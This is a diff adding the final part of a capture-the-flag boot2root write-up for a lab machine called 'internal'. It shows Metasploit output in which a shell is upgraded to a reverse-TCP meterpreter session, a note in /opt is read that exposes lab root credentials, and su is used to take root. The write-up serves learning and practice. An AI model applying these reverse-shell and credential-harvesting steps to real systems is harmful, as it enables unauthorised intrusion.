content/post/internal-boot2root-writeup.md

```diff
@@ -0,0 +1,543 @@
+msf5 post(multi/manage/shell_to_meterpreter) > set session 3
+session => 3
+msf5 post(multi/manage/shell_to_meterpreter) > set lport 4333
+lport => 4333
+msf5 post(multi/manage/shell_to_meterpreter) > run
+
+[*] Upgrading session ID: 3
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 10.10.253.137:4333 
+[*] Sending stage (980808 bytes) to 10.10.215.86
+[*] Command stager progress: 100.00% (773/773 bytes)
+[*] Post module execution completed
+msf5 post(multi/manage/shell_to_meterpreter) > kill sessessions -k 3
+[*] Killing the following session(s): 3
+[*] Killing session 3
+[*] 10.10.215.86 - Command shell session 3 closed.
+msf5 post(multi/manage/shell_to_meterpreter) > sessions 
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                                                                Connection
+  --  ----  ----                   -----------                                                                ----------
+  2         meterpreter x86/linux  no-user @ internal (uid=33, gid=33, euid=33, egid=33) @ 10.10.215.86       10.10.253.137:4433 -> 10.10.215.86:55326 (10.10.215.86)
+  4         meterpreter x86/linux  no-user @ jenkins (uid=1000, gid=1000, euid=1000, egid=1000) @ 172.17.0.2  10.10.253.137:4333 -> 10.10.215.86:38946 (172.17.0.2)
+```
+
+Given my success with the previous `/opt` directory, I blindly decided to look there first in the new shell.
+
+```
+meterpreter > ls /opt 
+Listing: /opt
+=============
+
+Mode              Size  Type  Last modified              Name
+----              ----  ----  -------------              ----
+100644/rw-r--r--  204   fil   2020-08-03 03:31:42 +0000  note.txt
+
+meterpreter > cat /opt/note.txt
+Aubreanna,
+
+Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
+need access to the root user account.
+
+root:tr0ub13guM!@#123
+```
+
+This, much to my surprise, ended up yielding a set of root credentials which I could have, ironically, obtained without going through all the trouble of popping another shell.
+
+### Root shell
+With the new root credentials, I `su`'d from my aubreanna shell and quickly found the final root flag in `root.txt`.
+
+```
+aubreanna@internal:~$ su -
+Password: 
+root@internal:~# ls
+root.txt  snap
+```
+
+## Summary
+I don't think this walk through effectively captures the amount of time that I'd spent poking around at each level of local enumeration. In my first run through, I'd spent a significant amount of time walking through directories externally on blog, internally in the blog's webroot as well as within the mysql database and phpmyadmin panels. This was repeated after popping a shell in the extensive time spent walking through service configurations and poking at the locally-bound services. It wasn't until I'd slowed down and started looking for out of place files that I'd stumbled on the `notes.txt` file in `/opt`. 
```

Comment:
this walkthrough faithfully captures the amount of time I spent poking around at each